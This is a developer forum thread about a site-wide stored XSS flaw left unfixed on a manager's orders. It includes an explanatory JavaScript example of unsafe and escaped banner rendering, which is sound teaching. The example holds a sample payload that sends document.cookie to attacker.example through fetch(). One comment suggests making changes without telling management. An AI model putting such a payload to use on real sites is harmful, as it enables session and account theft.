47
netikras
105d

A stored XSS vuln in a banner-like component, visible on ALL the pages in the portal. Anyone can attack anyone.

HOWEVER, this was not discovered by the 3rd-party security specialists during the latest security audit. I escalated this to my manager and was told that unless the client actively requests this to be fixed, I should not do anything about it.

FFS... it's only 2 lines of code... And there's nothing I can do about it.

Eventually I was transferred to another project. Now it's not my problem anymore.
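To make the "2 lines of code" concrete, here is an added example (not code from the original post or from the portal it describes) of what a banner component that renders a stored, attacker-controlled message looks like with and without output encoding. The function names, the `.banner` markup and the `attacker.example` hostname in the constructed sample message are assumptions made for the illustration.

```javascript
// Added example (not code from the original post): a banner component that
// renders a message stored server-side, first the vulnerable way and then with
// output encoding applied before the value reaches the markup.

// Escape the five characters that matter when untrusted text is inserted into
// an HTML text node or a double/single-quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the stored message is concatenated straight into the template,
// so any HTML/JS in it runs in every visitor's browser on every page that
// shows the banner (a stored, site-wide XSS).
function renderBannerUnsafe(message) {
  return `<div class="banner">${message}</div>`;
}

// Fixed: same component, the untrusted value is encoded first. This is the
// only line that differs from the vulnerable version.
function renderBannerSafe(message) {
  return `<div class="banner">${escapeHtml(message)}</div>`;
}

// Cheap review/unit-test check: after stripping the component's own wrapper,
// is there any tag left that did not come from the template? Encoded output
// contains no raw "<" at all, so a single remaining tag start is a finding.
function containsInjectedTag(html) {
  const inner = html
    .replace(/^<div class="banner">/, "")
    .replace(/<\/div>$/, "");
  return /<\s*\/?[a-z]/i.test(inner);
}

// Constructed sample (not a real payload seen on the portal): what a malicious
// user might save as their banner text. The hostname is an assumption.
const STORED_MESSAGE =
  'Welcome!<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Side-by-side demonstration when the file is run directly.
console.log("unsafe :", renderBannerUnsafe(STORED_MESSAGE));
console.log("safe   :", renderBannerSafe(STORED_MESSAGE));
console.log("unsafe has injected tag:", containsInjectedTag(renderBannerUnsafe(STORED_MESSAGE)));
console.log("safe   has injected tag:", containsInjectedTag(renderBannerSafe(STORED_MESSAGE)));
```

The encoding has to happen at the point where the value is written into HTML, not when it is stored; a message that was saved years ago by a user who no longer exists is still live in the banner on every page until the rendering side is fixed.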

Comments
  • 15
    2 lines of code?! Do you have to seek permission for every tiny code change like that?! If so that's madness. I would have just fixed it and notified management afterwards. If I got anything other than a positive response, it would have resulted in one heck of an argument.
  • 6
    @AlmondSauce Yepp, I have to get permission to push those 2 lines :) It's madness, I know...
  • 1
@AlmondSauce well, it always has to be reviewed, without exception (in my last three companies). But in such a culture there will always be a buddy around who will do the review in a minute :) I would fix it before saying anything to management, maybe not even tell them, they might start to panic..
  • 2
    @rooter Code reviews, sure. But they're generally about making sure the code committed is sensible, follows style guidelines etc. They're not a tool for management to use to decide what features or fixes should be worked on.
  • 1
Regardless of the team you are on now, create the PR, leave it on them, cover your ass.